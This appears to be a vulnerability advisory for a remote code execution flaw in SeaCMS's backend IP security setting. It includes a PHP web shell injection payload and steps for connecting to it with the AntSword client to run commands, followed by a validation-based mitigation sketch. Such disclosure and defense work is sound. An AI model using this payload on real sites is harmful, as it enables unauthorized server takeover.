SeaCMS Remote Code Execution (RCE)

1. Vulnerability Description

1.1 Vulnerability Introduction

Testing found a remote code execution vulnerability in /augap/adminip.php. An attacker can insert malicious code into the input box of the backend IP security settings, and that code is then executed.

1.2 Problem Types

Remote code execution

1.3 Vulnerability threat level

High risk

1.4 Component Description

SeaCMS is a free, open-source website content management system written in PHP. This system is mainly designed to manage video on demand resources.

1.5 Scope of Impact

Full version of SeaCMS

2. Vulnerability Reproduction

Open the SeaCMS backend system.

Click System -> Background IP Security Settings.

Code entered in the input box gets executed:

Payload=127.0.01 "; @ eval ($_POST ["hacker"]);?>

Click Confirm; the page is updated.

Connect using China AntSword.

After the connection is configured, the connection test succeeds.

The virtual terminal can now be opened to execute commands.
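
A mitigation sketch for the IP security setting described above, added here as an example (it is not SeaCMS code and not part of the original post). It assumes, from the shape of the payload, that the submitted value is written into a PHP file that is later included; the function names and the output path are hypothetical.

```php
<?php
// Added example; helper names and the output path are hypothetical, not SeaCMS code.

// Parse the submitted allow-list. Returns null if ANY entry is not an IP
// literal, so the caller rejects the whole request instead of saving part of it.
function parse_ip_allowlist(string $raw): ?array
{
    $ips = [];
    foreach (preg_split('/[\s,]+/', trim($raw), -1, PREG_SPLIT_NO_EMPTY) as $entry) {
        // FILTER_VALIDATE_IP accepts only IPv4/IPv6 literals, so quotes,
        // semicolons and PHP tags can never reach the saved file.
        if (filter_var($entry, FILTER_VALIDATE_IP) === false) {
            return null;
        }
        $ips[] = $entry;
    }
    return array_values(array_unique($ips));
}

// Persist the list as data. var_export() emits a correctly quoted PHP literal,
// so the values cannot close the string and continue as code.
function save_ip_allowlist(array $ips, string $path): bool
{
    $body = "<?php\nreturn " . var_export($ips, true) . ";\n";
    $tmp  = $path . '.tmp';
    if (file_put_contents($tmp, $body, LOCK_EX) === false) {
        return false;
    }
    return rename($tmp, $path); // replace the old file in one step
}

// Constructed sample inputs; the last one is the payload string quoted in the post.
$samples = [
    "127.0.0.1",
    "127.0.0.1, 10.0.0.5\n::1",
    '127.0.01 "; @ eval ($_POST ["hacker"]);?>',
];
$path = sys_get_temp_dir() . '/ip_allowlist_example.php';

foreach ($samples as $raw) {
    $ips = parse_ip_allowlist($raw);
    if ($ips === null) {
        echo "rejected: not a list of IP addresses\n";
        continue;
    }
    echo (save_ip_allowlist($ips, $path) ? "saved: " : "write failed: ") . implode(', ', $ips) . "\n";
}
```

Validation and quoting are applied together on purpose: the allow-list check stops non-IP input at the form, and var_export() keeps the write safe even if the validation is later loosened.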
